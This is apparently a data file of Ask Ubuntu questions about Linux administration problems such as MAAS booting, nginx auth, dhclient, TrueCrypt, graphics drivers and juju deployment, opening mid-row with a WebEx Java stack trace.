java.lang.class.newinstance0 ( class.java:374 ) at java.lang.class.newinstance ( class.java:327 ) at db.reset ( db.java:192 ) at mysystem.initsystem ( mysystem.java:132 ) at jdownload.run ( jdownload.java:253 ) at java.lang.thread.run ( thread.java:722 ) xxx [ dbr ] load native library failed begin of log initialization initfileoutputstream ( ) run ... 4 end of log initialization begin of wbxtracepallet initialization 1 end of wbxtracepallet initialization resource : svc resource : svc_en resource : svc_en_us [ svcui ] ... ... ... ... ... ... svcui construct begin ... ... ... ... ... ... 2010-05-02 [ svcui ] ... ... ... ... ... ... svcui construct end ... ... ... ... ... ... [ svcui ] [ init ] type:0 iservice : svcuiservice @ 326238b5 svc component version 2010.07.27 # # # # # # try to load class jnrw in mycloassloader2 ... java.lang.unsatisfiedlinkerror : /home/mrmccormack/.webex/1124/libatdv.so : /home/mrmccormack/.webex/1124/libatdv.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1838 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at jnrw . ( jnrw.java:45 ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:525 ) at java.lang.class.newinstance0 ( class.java:374 ) at java.lang.class.newinstance ( class.java:327 ) at jdocview.createdocviewui ( jdocview.java:629 ) at jdocview.pdnewinstance ( jdocview.java:4293 ) at meetingclientframe . ( meetingclientframe.java:289 ) at jmeetingclient.constructmainframe ( jmeetingclient.java:325 ) at confmgr.connecttomeeting ( confmgr.java:197 ) at jmeetingclient.init ( jmeetingclient.java:275 ) at jdownload.run ( jdownload.java:278 ) at java.lang.thread.run ( thread.java:722 ) xxx [ jnrw ] load native library failed # # # 1 runtime total memory : 78249984 , free memory : 44387408 # # # 2 runtime total memory : 78249984 , free memory : 64752880 java.lang.unsatisfiedlinkerror : /home/mrmccormack/.webex/1124/libatdv.so : /home/mrmccormack/.webex/1124/libatdv.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1838 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at jnrw . ( jnrw.java:45 ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:525 ) at java.lang.class.newinstance0 ( class.java:374 ) at java.lang.class.newinstance ( class.java:327 ) at jdocview.createdocviewui ( jdocview.java:629 ) at jdocview.pdnewinstance ( jdocview.java:4293 ) at meetingclientframe . ( meetingclientframe.java:289 ) at jmeetingclient.constructmainframe ( jmeetingclient.java:325 ) at confmgr.connecttomeeting ( confmgr.java:197 ) at jmeetingclient.init ( jmeetingclient.java:275 ) at jdownload.run ( jdownload.java:278 ) at java.lang.thread.run ( thread.java:722 ) xxx [ jnrw ] load native library failed # # # 1 runtime total memory : 78249984 , free memory : 64549200 # # # 2 runtime total memory : 78249984 , free memory : 66873512 java.lang.unsatisfiedlinkerror : /home/mrmccormack/.webex/1124/libatdv.so : /home/mrmccormack/.webex/1124/libatdv.so : wrong elf class : elfclass32 ( possible cause : architecture word width mismatch ) at java.lang.classloader $ nativelibrary.load ( native method ) at java.lang.classloader.loadlibrary1 ( classloader.java:1939 ) at java.lang.classloader.loadlibrary0 ( classloader.java:1864 ) at java.lang.classloader.loadlibrary ( classloader.java:1838 ) at java.lang.runtime.loadlibrary0 ( runtime.java:845 ) at java.lang.system.loadlibrary ( system.java:1084 ) at jnrw . ( jnrw.java:45 ) at sun.reflect.nativeconstructoraccessorimpl.newinstance0 ( native method ) at sun.reflect.nativeconstructoraccessorimpl.newinstance ( nativeconstructoraccessorimpl.java:57 ) at sun.reflect.delegatingconstructoraccessorimpl.newinstance ( delegatingconstructoraccessorimpl.java:45 ) at java.lang.reflect.constructor.newinstance ( constructor.java:525 ) at java.lang.class.newinstance0 ( class.java:374 ) at java.lang.class.newinstance ( class.java:327 ) at jdocview.createdocviewui ( jdocview.java:629 ) at jdocview.pdnewinstance ( jdocview.java:4293 ) at meetingclientframe . ( meetingclientframe.java:289 ) at jmeetingclient.constructmainframe ( jmeetingclient.java:325 ) at confmgr.connecttomeeting ( confmgr.java:197 ) at jmeetingclient.init ( jmeetingclient.java:275 ) at jdownload.run ( jdownload.java:278 ) at java.lang.thread.run ( thread.java:722 ) xxx [ jnrw ] load native library failed [ svcui ] [ onmessagefromservice ] set_roster_changed:220 change:1 svcui:743824904 [ svcui ] [ setrosterchanged ] index : -1 change:1 userid:16781313 attendeeid:3 userid:16781313 username : kevin u12 desktop ishost : false ispresenter : false chat component version = 2010.05.18.1040 resource : atlchat resource : atlchat_en resource : atlchat_en_us notes component version = 2010.04.27.0001 resource : atnotes resource : atnotes_en resource : atnotes_en_us exception in thread `` awt-eventqueue-3 '' java.lang.illegalstateexception : this function should be called while holding treelock at java.awt.component.checktreelock ( component.java:1196 ) at java.awt.container.validatetree ( container.java:1682 ) at wbxcombobox.matchitemfont ( wbxcombobox.java:188 ) at wbxcombobox.setselecteditem ( wbxcombobox.java:170 ) at chatui.setnonlistitem ( chatui.java:1142 ) at chatui.updatesendtoitems ( chatui.java:1099 ) at chatui.updatesendto ( chatui.java:895 ) at simplechat $ 1.run ( simplechat.java:310 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:727 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:688 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:686 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:697 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) exception in thread `` awt-eventqueue-3 '' java.lang.illegalstateexception : this function should be called while holding treelock at java.awt.component.checktreelock ( component.java:1196 ) at java.awt.container.validatetree ( container.java:1682 ) at chatcontrolpane.access $ 100 ( chatcontrolpane.java:61 ) at chatcontrolpane $ 1 $ 1.run ( chatcontrolpane.java:120 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:727 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:688 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:686 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:697 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) exception in thread `` awt-eventqueue-3 '' java.lang.illegalstateexception : this function should be called while holding treelock at java.awt.component.checktreelock ( component.java:1196 ) at java.awt.container.validatetree ( container.java:1682 ) at chatcontrolpane.access $ 100 ( chatcontrolpane.java:61 ) at chatcontrolpane $ 1 $ 1.run ( chatcontrolpane.java:120 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:727 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:688 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:686 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:697 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 ) exception in thread `` awt-eventqueue-3 '' java.lang.illegalstateexception : this function should be called while holding treelock at java.awt.component.checktreelock ( component.java:1196 ) at java.awt.container.validatetree ( container.java:1682 ) at chatcontrolpane.access $ 100 ( chatcontrolpane.java:61 ) at chatcontrolpane $ 1 $ 1.run ( chatcontrolpane.java:120 ) at java.awt.event.invocationevent.dispatch ( invocationevent.java:251 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:727 ) at java.awt.eventqueue.access $ 200 ( eventqueue.java:103 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:688 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:686 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.protectiondomain $ 1.dointersectionprivilege ( protectiondomain.java:76 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:697 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:242 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:161 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:150 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:146 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:138 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:91 )
301150	install nodes error ( could not find kernel image )	i am just starting to test maas . i installed ubuntu 13.04 i386 server with maas option , modified /etc/maas/import_pxe_files to add raring to releases ( also import_ephemerals ) , and ran maas-import-pxe-files , no error returned . when i try to install a node , it gets an ip from maas-dhcp , and tries to boot from tftp but then the following error appears : could not find kernel image : i386/generic/raring/commissioning/linux i looked for the files in /var/lib/maas/tftp , but from there the only path to the image is i386/generic/raring/install/linux note , `` install '' instead of `` commissioning '' i somehow found that there is a `` purpose '' option for some tftp python scripts , with possible values `` install '' or `` commissioning '' , but i dont know how to change it , or how can i say that the images are in the `` install '' directory or what i am missing , did i miss a step to properly configure nodes installation ? thanks in advance ,
301157	apache redirects all hosts to external url	apache suddenly began to redirect all my local hosts ( ex . test.dev ) to external url . how to trace that , or any solution pls .
301160	nginx basic auth and subfolders	i have a problem with subfolders in a basic auth procted folder . in the protected folder i have a folder named phpmyadmin , which contains phpmyadmin . im not able to run phpmyadmin , when basic is activated . whenn i call the the folder , i get a save-as dialog ( type : application/octet-stream ( 18,3 kb ) ) . here the important parts of mysites-available/default location ^~ /administration/ { auth_basic `` restricted area '' ; auth_basic_user_file /var/www/myproject/sec/htpasswd ; } location ~ \.php $ { fastcgi_pass unix : /var/run/php5-fpm.sock ; fastcgi_index index.php ; include fastcgi_params ; } any ideas , how i can run php in basic-auth protected subfolders ? edit : without basic_auth phpmyadmin is running without problems .
301165	activate dash after minimal gui installation on ubuntu server	i installed the ubuntu desktop package without recommends on ubuntu server 12.04 and noticed that dash does not work - it just wo n't find any applications ( screenshot ) . how can i activate it ? i assume that some required packages were not installed ( on the other hand , dependencies are always checked ... ) . appriciate any help .
301174	how to start dhclient at boot ?	here 's the problem : root @ home : ~ # ping 8.8.8.8 connect : network is unreachable root @ home : ~ # dhclient eth0 rtnetlink answers : file exists root @ home : ~ # ping 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_req=1 ttl=51 time=16.8 ms 64 bytes from 8.8.8.8 : icmp_req=2 ttl=51 time=16.6 ms ^c -- - 8.8.8.8 ping statistics -- - 2 packets transmitted , 2 received , 0 % packet loss , time 1002ms rtt min/avg/max/mdev = 16.654/16.737/16.820/0.083 ms root @ home : ~ # network is working only after i manually invoke dhclient . i do n't have networkmanager ( removed it ) . here are relevant lines from /etc/network/interfaces : auto eth0 iface eth0 inet dhcp and here is startup log : root @ home : ~ # cat /var/log/syslog | grep dhclient may 28 21:39:44 home kernel : [ 7.237076 ] type=1400 audit ( 1369762781.497:2 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /sbin/dhclient '' pid=405 comm= '' apparmor_parser '' may 28 21:39:44 home kernel : [ 7.238298 ] type=1400 audit ( 1369762781.497:4 ) : apparmor= '' status '' operation= '' profile_load '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=405 comm= '' apparmor_parser '' may 28 21:39:45 home dhclient : dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 8 ( xid=0x79607e29 ) may 28 21:39:45 home dhclient : dhcprequest of 192.168.0.103 on eth0 to 255.255.255.255 port 67 ( xid=0x79607e29 ) may 28 21:39:45 home dhclient : dhcpoffer of 192.168.0.103 from 192.168.0.1 may 28 21:39:45 home dhclient : dhcpack of 192.168.0.103 from 192.168.0.1 may 28 21:39:45 home dhclient : bound to 192.168.0.103 -- renewal in 234779 seconds . may 28 21:39:45 home kernel : [ 11.695666 ] type=1400 audit ( 1369762785.953:10 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /sbin/dhclient '' pid=1154 comm= '' apparmor_parser '' may 28 21:40:11 home dhclient : dhcprequest of 192.168.0.103 on eth0 to 255.255.255.255 port 67 ( xid=0x2aa61c47 ) may 28 21:40:11 home dhclient : dhcpack of 192.168.0.103 from 192.168.0.1 may 28 21:40:11 home dhclient : bound to 192.168.0.103 -- renewal in 243414 seconds . any ideas what may cause such problem ?
301175	running truecrypt on ubuntu without root privileges	i have an encrypted trucrypt volume that i would like to mount from my university labs running ubuntu 12.10 . i do not have root permissions . i download the file truecrypt-7.1a-linux-x86.tar.gz from the download page . i extract it and gettruecrypt-7.1a-setup-x86 which i run . i can not install anything here , so from the dialog that pops out i choose `` extract .tar package file '' . then i get the message : installation package 'truecrypt_7.1a_i386.tar.gz ' extracted and placed in '/tmp' i copy that file to my current folder and i extract it : acomputer : /media/myname/transcend > tar -xvzf truecrypt_7.1a_i386.tar.gz usr/bin/truecrypt usr/bin/truecrypt-uninstall.sh usr/share/applications/truecrypt.desktop usr/share/pixmaps/truecrypt.xpm usr/share/truecrypt/doc/license.txt usr/share/truecrypt/doc/truecrypt user guide.pdf if i browse in that folder : acomputer : /media/myname/transcend/usr/bin > ls -lh total 4.6m -rw-r -- r -- 1 myname student 4.5m feb 7 2012 truecrypt -rw-r -- r -- 1 myname student 453 feb 7 2012 truecrypt-uninstall.sh acomputer : /media/myname/transcend/usr/bin > ./truecrypt ./truecrypt : permission denied . i could not change my permissions to make that executable . so , i can not run a portable truecrypt like this . any hints about this situation ? how can i run truecrypt without root privileges ?
301177	how do i resolve dns issues ?	this may be a completely stupid question , but here goes . i 've been having issues with my network . this is not an isp problem , since the internet works perfectly on my mac partition and on the other computers in my house . the internet on ubuntu works intermittently , and once i have gained access to a sever , i can continue navigating on that server without issue . but when i try to access other servers , about half of the time the server can not be found . restarting my wifi will sometimes resolve the issue temporarily , sometimes it will not . because other computers and partitions operate without issue , i am fairly confident this is a software issue in ubuntu.does anyone know how to fix this ?
301183	broken package when trying to install libminiupnpc-dev	i 'm not sure how to resolve the following broken package errors . i have libminiupnpc8 installed from a ppa ( 1.6-precise2 ) and when i want to install libminiupnpc-dev , it wants to install libminiupnpc8 ( 1.6-3ubuntu1 ) from the standard repository . what 's the best way to resolve this ? can i set a precedent in the repository list so it will take the ubuntu one before the private one ? $ sudo apt-get install libminiupnpc-dev reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libminiupnpc-dev : depends : libminiupnpc8 ( = 1.6-3ubuntu1 ) but 1.6-precise2 is to be installed e : unable to correct problems , you have held broken packages .
301188	ubuntu 13.04 not booting from hard drive after installing from usb	i installed 13.04 from a usb on my desktop and everything is fine until i shut down , go to suspend or restart . it asks for a boot-able drive . i checked the bios and the hard drive is the first boot-able option . when i put the usb in and restart it loads everything over again and everything is running very slow on ubuntu .
301197	13.04 : chaged graphic driver , lost unity	after changing my graphic driver to one of the options shown as proprietary , i lost unity ( wallpaper shows , terminal can be opened with ctrl+t , but nothing else displays ) . my notebook : dell vostro 3560 , intelâž coreâ˘ i7-3612qm , amd radeon hd 7670m , 1 gb vram what i already did is : reboot install fglrx-legacy add unity_force_start=1 to /etc/environment sudo apt-get remove fglrx-* reinstall the driver with sudo apt-get install fglrx-legacy and ... fglrx-* ( tried them all ) for the last one : `` fglrx-installer '' as mentioned in the link was not found . the error : when i go to terminal ( ctrl+alt+f1 ) and run the command unity , i get some hundred error lines reading like compiz ( opengl ) - fatal : glxqueryextensionsstring is null for screen 0 if it helps : lspci| grep vga returns vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) vga compatible controller : advanced micro devices [ amd ] nee ati thamas xt [ radeon hd 7670m ] the question : how can i revert my change to a proprietary graphic driver without beeing able to open the drivers window i made the changes in ? thank you ! edit : i followed the proposed procedure , unfortunately i had no success , as there where multiple errors . eventually someone is able to interpret them . 1 ) /etc/x11/xorgs.conf does not exist . 2 ) unitx-reset gives 50+ errors `` dconf-warning ** : failed to commit changed to dconf : error spawning command line 'dbus launch -- autolaunch ... '' 3 ) installing fglrx from launchpad failed for dozens of unresolveable dependencies . 4 ) sudo apt-get install fglrx how can i get rid of all manually installed drivers and use the pre-installed ones that where shipped on the cd ? thanks !
301199	install ubuntu server 12.04.2 lts with raid 5	i 'm currently installing ubuntu server 12.04.2 . the hardware is as follows : 1 500gb hdd for ubuntu 4 3tb hdd 's for the raid 5 array . i 'm just wondering : during the partition part of the install , do i simply install the os on the 500gb hdd , partitionning only this one and leaving the other hdd 's for the moment . or can i set the raid up at the same time ? thanks in advance for any answer .
301207	no command 'update ' found , what should i use instead ?	i had a problem while booting my pc , the same as this one : `` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present '' error at boot . i tried with these instructions , but i 'm stuck at the 7th step : update /etc/initramfs-tools/conf.d/resume with the new uuid ex . resume=uuid=06a9be15-d05b-466d-bfe3-a086bb9cdba0 i typed update /etc/initramfs-tools/conf.d/resume uuid=d6cc5d42-0375-48a2-b4e1-a3a52ad25c7a but i get no command 'update ' found , did you mean : command 'pupdate ' from package 'pbuilder-scripts ' ( universe ) command 'lupdate ' from package 'qt4-linguist-tools ' ( main ) command 'uupdate ' from package 'devscripts ' ( main ) command 'xupdate ' from package 'libxml-xupdate-libxml-perl ' ( universe ) update : command not found any ideas about how to solve it ? p.s . : i am using ubuntu 13.04 .
301213	restoring a single file with deja-dup without scanning the entire backup archive	i 'm trying to restore a single file with deja-dup but when i do this it starts scanning the entire frigging backup archive . is there any way i can have it just restore the file i 'm asking for without wasting an hour scanning every single file it can find .
301218	`` unknown file system '' error in fstab when trying to mount a cifs share	anyone have an idea why a cifs mounted share suddenly does n't work in fstab ? i can mount it from the command line , but mount -a gives : unknown file system '-o ' . i had a bit of trouble getting it to work a few weeks ago , but after some research i figured out the line that i needed . //10.x.x.x/shared /mnt/shared -o credentials=/etc/cifspwd , rw , dir_mode=0777 , file_mode=0777 0 0 then after updating last week and rebooting the server , it would n't mount and i had to `` skip '' it . as i mentioned , i can mount it manually , but not via fstab . i 'm running server 12.04
301219	how can i center an activityindicator within the screen ?	how can i center an activityindicator within the screen ? my current code is : column { row { activityindicator { anchors.leftmargin : units.gu ( 10 ) running : true } } }
301223	dependency probs at configuration , linux-generic ubuntu 12.04	after today 's update which ran with the following message ( sorry its in german ) : dpkg : abh채ngigkeitsprobleme verhindern konfiguration von linux-generic : linux-generic h채ngt ab von linux-image-generic ( = 3.2.0.39.47 ) ; aber : version von linux-image-generic auf dem system ist 3.2.0.44.53. linux-generic h채ngt ab von linux-headers-generic ( = 3.2.0.39.47 ) ; aber : version von linux-headers-generic auf dem system ist 3.2.0.44.53. dpkg : fehler beim bearbeiten von linux-generic ( -- configure ) : abh채ngigkeitsprobleme - verbleibt unkonfiguriert es wurde kein apport-bericht verfasst , da die fehlermeldung darauf hindeutet , dass dies lediglich ein folgefehler eines vorherigen problems ist . fehler traten auf beim bearbeiten von : linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 ) uname -r > 3.2.0-38-generic google translation : dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.39.47 ) , but : version of linux-image-generic 3.2.0.44.53 on the system . linux-generic depends on linux-headers-generic ( = 3.2.0.39.47 ) , but : version of linux-headers-generic 3.2.0.44.53 on the system . dpkg : error processing linux-generic ( - configure ) : dependency problems - leaving unconfigured there was no apport report written because the error message indicates that this is merely a result of a previous error problem . errors were encountered while processing : it looked like /boot was full ( 100 % ) moving a few older versions -29 until 33 from boot to a backup directory did not solve the prob as well . i tried different solutions which did not work : how can i resolve dpkg dependency ? linux headers not found aptitude upgrade linux 3.2.0-39 problem can i uninstall the newer kernel images ?
301224	wireless connections `` device not ready ( firmware missing ) '' 12.04	i 'm running ubuntu 12.04 on an old dell laptop and have been for the last few weeks . up until now , wireless has functioned fine ; however , i got this message after rebooting today . the computer froze and i was forced to restart it by way of the button on the keyboard ( i believe it 's called a hard restart ? ) . i tried toggling the hardware switch on and off without success . i rebooted the computer again , this time through the `` shut down '' command , but the problem persists . my laptop is quite old and its previous owner was apparently rather rough with it ; the ethranet port does not work . i have no other means of accessing the internet except through my ipod touch ( which is how i am writing this now ) . is there any way to fix this problem ? thanks in advance !
301225	unwanted output audio looping through input	i have a fresh xubuntu install and i 'm trying to configure the sound , i 've got a creative xfi titanium series sound card at the moment when i 'm talking online in mumble/skype/teamspeak etc.. my output audio is passed out as well as my input , i.e . if i was listening to music the people listening to me would also hear the music ( not through my microphone , wearing a headset ) and it will completely down out my voice . sound input as you can see i 've disabled the monitor which i initially thought was the problem all my searches for trying to solve this just turn up people wanting to hear their microphone through their speakers and not about a sound loop going the other way .
301226	youtube not playing , adobe flash installed ! dailymotion and other videos sides work good !	as my title says , dailymotion and other video sites work good , but youtube does play videos please help . ubuntu 12.04 version , 32 bit operating system .
301231	hotline miami wo n't download in steam	i click install , and the normal dialog show up informing me that hotline miami is downloading , but it never starts to download . it allows me to try running the game , and complains about a missing executable .
301233	how much would an ubuntu tablet cost ? where could i find one ?	i know that canonical will produce ubuntu tablets , and i 'd buy one , but i do n't know how much would it cost and where will i find it .
301235	`` new ubuntu release 12.04 is available '' i do n't see this message in update manager ( ubuntu 11.10 )	i want to upgrade from ubuntu 11.10 to 12.04 . i have selected `` for any new version '' in `` notify me of a new ubuntu version '' . i executed the following commands successfully : sudo apt-get update sudo apt-get upgrade sudo apt-get dist upgrade do-release-upgrade do-release-upgrade did work successfully for the first time and for the subsequent times obviously it said `` no new release found '' , but after this what am i supposed to do ? now there are no updates to install , but i still do n't get the `` new ubuntu release 12.04 is available '' message in the update manager . i looked at a lot of other questions , but none of them seem to work for me .
301237	increasing partition size with unallocated space to the left	i have 100mb unallocated at the beginning of my hard drive . how can i merge them to another partition ? gparted only allows me to increase space if it is in the right . if i try to increase the partition to the left , it tells me that moving a partition might cause my operating system to fail to boot . thanks .
301239	why does my system takes so long to recognize that i 'm typing in the keyboard ?	hello fellow linux users , i would like to ask you for help . i am running on 12.04 and windows 7 ( dual boot ) . i have some trust keyboard , and it is working fine in windows7 , but when i log into ubuntu , i must press key harder and i must hold 'em a while . i even tried set something up in keyboard setting , but that is not helping me . so , what should i do ?
301241	how to preserve custom configurations across reboots when using juju and maas ?	i 've installed maas to get a set of ubuntu 12.04 servers running and i used juju to install the hadoop charm on them , but i needed to change some of the configuration settings on one of the machines to make it work . i noticed that after rebooting the machine my changes were removed and the original settings were back . is there a non-hacky way ( custom shell script that runs on reboot ) to define configurations that need to be reloaded ? in my case i would like to simply define the file that should be reloaded on reboot . i believe this is an issue that goes beyond the hadoop charm specifically ( hopefully ) . system 12.04 stock maas 12.04 stock juju ( 0.5bzr ) 12.04 stock hadoop charm ( but my question is for the general case )
301243	juju deploy issue : connection was refused by other side	i am trying to deploy maas + juju on a 10 node infrastructure . i have easily configured maas ( 13.04 lts ) on one node and queued 6 other nodes , also have got juju installed on the maas node , now the issue is when i deploy wordpress as suggested in example , it gets initiated fine but stays pending because of connection time out issue on node1 , 2013-05-29 00:43:10,899 : juju.agents.machine @ debug : units changed old : set ( [ ] ) new : set ( [ 'wordpress/9 ' ] ) 2013-05-29 00:43:10,899 : juju.agents.machine @ debug : starting service unit : wordpress/9 ... 2013-05-29 00:43:11,028 : unit.deploy @ debug : downloading charm cs : precise/wordpress-15 to /var/lib/juju/charms 2013-05-29 00:43:11,071 : juju.agents.machine @ error : error starting unit : wordpress/9 traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/juju/agents/machine.py '' , line 97 , in watch_service_units yield self.unit_deployer.start_service_unit ( unit_name ) connectionrefusederror : connection was refused by other side : 111 : connection refused . ======================================================== maasadmin @ boxone : ~ $ juju -v status machines : 0 : agent-state : running dns-name : node3.master instance-id : /maas/api/1.0/nodes/node-f87f30e6-c788-11e2-a0dd-984be17f8190/ instance-state : unknown 1 : agent-state : running dns-name : node1.master instance-id : /maas/api/1.0/nodes/node-aa3eaf8e-c787-11e2-b3fd-984be17f8190/ instance-state : unknown services : wordpress : charm : cs : precise/wordpress-15 relations : loadbalancer : - wordpress units : wordpress/9 : agent-state : pending machine : 1 public-address : null 2013-05-29 01:07:43,185 info 'status ' command finished successfully any help on this would be great
301244	picture tab is missing	when i first dowloaded ubuntu , i accidentaly deleted the `` pictures '' folder in home area . becasue of this , there 's no `` pictures '' tab on the side . i 've gotten around this by just creating a folder called `` pictures '' but it does n't show up in the side bar . do you know how to get it there ? i tried clicking and dragging , but to no avail . thanks for the help !
301245	ubuntu installed grub over refit	i had my mac set up with refit and installed ubuntu 13.04 , unfortunately grub was installed over refit . i was not expecting this and have since found out that i have no idea where my installation disk is for osx 10.8 . i want to boot to osx , but i can not do boot repair using any osx tools since i have lost the ability to boot to this . any suggestions ? grub lists the ubuntu options along with mac osx 32 and 64bit , neither of which work .
301252	unable to delete custom colors under appearance/background	the `` background '' panel in `` system settings/appearance '' , allows to select the background color of the desktop , solid or with a gradient . there , the `` pick a color '' window allows to choice a color from a standard palette , or a custom color . whenever you select a custom color , a corresponding sample is shown under the standard palette . it happens , however , that there is no obvious way to delete a custom color , so the line of samples grows accordingly . so there is a problem when you want to delete a number of custom colors . the data of these colors , which are associated with the user , are supposedly in the home directory , but i 've not find any reference to them . can you suggest me where to look ?
301253	remastersys : some shortcuts were not kept	ubuntu 12.04 installed on hard drive . i then installed pcmanfm and moved it to the launcher ( as a shortcut ) . gedit was already installed and i moved it as shortcut to the launcher . installed remastersys , ran it with the `` dist '' parameter and burned the custom-iso to a dvd . tested the livedvd -- pcmanfm is installed but the two shortcuts ( pcmanfm and gedit ) i had put on launcher are missing . thanks in advance for any help .
301257	inexpensive way to get ubuntu lts with 100 % certainty that it has not been compromised	i need an ubuntu installation that i can be 100 % certain has no root kits etc . unfortunately , buying the cds on the ubuntu store would cost me roughly $ 25 plus shipping and handling ( pretty steep for a free os ) . but if i download it to my desktop , i ca n't be 100 % sure that it will not be compromised because i ca n't be 100 % sure that my desktop is not compromised ( i 'm roughly 95 % sure my desktop is clean ) . am i overlooking an obvious way to achieve this result ? ( it seems to me there should be a way to buy a single lts cd for a couple dollars so that people can start fresh with an installation they know is uncompromised . )
301259	13.04 application minimizing choppy & freezing	i am running ubuntu 13.04 on my 13 '' macbook ( 2008 model ) and i have been running it on 13.04 since its release and have not had one problem with it yet . about 2 weeks ago i began messing around with unity tweak and so no issues . today , when i go to minimize an application ( happens to any application , regardless of minimized or windowed ) , it freezes halfway during its minimization . the application 's window is translucent and the computer will not respond unless i press the eject button on my keyboard ( i randomly pressed it to see if it would respond to it ) . once i press the eject button , the window minimizes and i get control again . i have removed unity tweak and i am still getting issues . it does n't necessarily hinder the system , its just really annoying .
301268	wireless not working on dell latitude d430	i have recently installed version 12.04 lts on a dell latitude d430 . i have tried to get the wireless card to work for the past 3 days and i have been unsuccessful . i installed all the recent updates . for some reason the os is not recognizing the driver for the wireless card .
